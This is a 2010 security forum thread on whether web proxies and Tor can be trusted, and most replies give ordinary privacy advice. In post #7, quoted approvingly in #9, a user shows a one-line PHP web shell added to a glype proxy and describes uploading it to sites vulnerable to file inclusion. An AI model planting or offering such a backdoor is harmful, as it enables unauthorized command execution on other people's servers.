-
August 31st, 2010, 10:14 PM
#1
Junior Member
Proxy Question
Hi all,
i'm a newbie to security, not PC's in general. So don't be afraid to get technical.
I have seen many websites suggesting hackers use proxies to be anonymous online and that your average user could even be using a proxy.
The question i have is: programs like IP Hider Platinum are a joke in my experience, they rarely work properly and some web based proxy servers have been known to keylog users to steal data.
How can you ensure the proxy you're using is safe?
Look forward to some answers.
-
September 1st, 2010, 03:54 AM
#2
Do what I am doing. Run your own proxy. They are easy to set up and configure. I also configured htaccess to limit the users to those of my choosing. If nothing else, use TOR. It won't provide security, but will provide a level of anonymity. I have heard of people running SSLStrip on exit nodes, so be careful.
I suppose the question is, are you looking for ways to remain anonymous, or are you looking to bypass a content filter? For bypassing a content filter, running your own is a great option. If you are trying to remain anonymous, that won't help you, because they will trace it back to your web server anyway.
\"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"
-HST
-
September 1st, 2010, 11:20 AM
#3
Agree with Westin.. but simply put.. unless the proxy is one you've setup, or was setup and maintained by someone you know you can trust, then you can't be sure its safe ...
... and also any lax attitudes in maintaining the proxy and the server its running on, also leads to an unsafe proxy (ie. server gets compromised, and no one notices for a few days..)
-
September 1st, 2010, 03:06 PM
#4
Used TOR before to bypass contents filters unable of scanning encrypted however its damm slow :P
The world is a dangerous place to live; not because of the people who are evil, but because of the people who don't do anything about it.
Albert Einstein
-
September 1st, 2010, 03:41 PM
#5
We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging
MLF
How people treat you is their karma- how you react is yours-Wayne Dyer
-
September 1st, 2010, 03:45 PM
#6
Originally Posted by morganlefay
We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging
MLF
Hahaha! That is great.
\"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"
-HST
-
September 1st, 2010, 07:17 PM
#7
I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
PHP Code:
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
die;
to double as a web based shell aswell. I would look for a site vulnerable to remote file inclusion, upload it, then I trolled other sites.
Heh I litterally ran out publicly used web based proxys. It would have been cool if the mods here setup some sort of NORAD-like geographical graph of it all.
-
September 1st, 2010, 07:18 PM
#8
Junior Member
Originally Posted by westin
Do what I am doing. Run your own proxy. They are easy to set up and configure. I also configured htaccess to limit the users to those of my choosing. If nothing else, use TOR. It won't provide security, but will provide a level of anonymity. I have heard of people running SSLStrip on exit nodes, so be careful.
I suppose the question is, are you looking for ways to remain anonymous, or are you looking to bypass a content filter? For bypassing a content filter, running your own is a great option. If you are trying to remain anonymous, that won't help you, because they will trace it back to your web server anyway.
thanks Westin.
I've had a look at Tor and i've got some more questions;
How is Tor more safe than other proxies?
When you mention SSL Strip on exit nodes, do you mean the end client could be in effect, waiting to attack your PC?
Personally i'm just researching security at the moment. I've had a quick look around and i think Tor looks like it'd be excellent as a way of bypassing web/content filters etc but you mention it's not good for security? Can you elaborate on this?
-
September 2nd, 2010, 03:37 AM
#9
Originally Posted by The-Spec
I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
PHP Code:
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
die;
to double as a web based shell aswell.
Dude...That's actually kind of neat!
-
September 2nd, 2010, 01:22 PM
#10
Originally Posted by morganlefay
We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging
MLF
That got a smile on my dial. How much was he suckered to pay? Have you had a word to him about it? maybe a print out of he's activities..
Similar Threads
-
By kilerboots in forum Newbie Security Questions
Replies: 5
Last Post: April 22nd, 2003, 02:22 PM
-
By instronics in forum Miscellaneous Security Discussions
Replies: 2
Last Post: January 17th, 2003, 02:40 PM
-
By tenguzero in forum Microsoft Security Discussions
Replies: 1
Last Post: March 16th, 2002, 06:11 AM
-
By E5C4P3 in forum The Security Tutorials Forum
Replies: 4
Last Post: March 1st, 2002, 06:34 AM
-
By Ennis in forum The Security Tutorials Forum
Replies: 4
Last Post: November 28th, 2001, 04:27 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|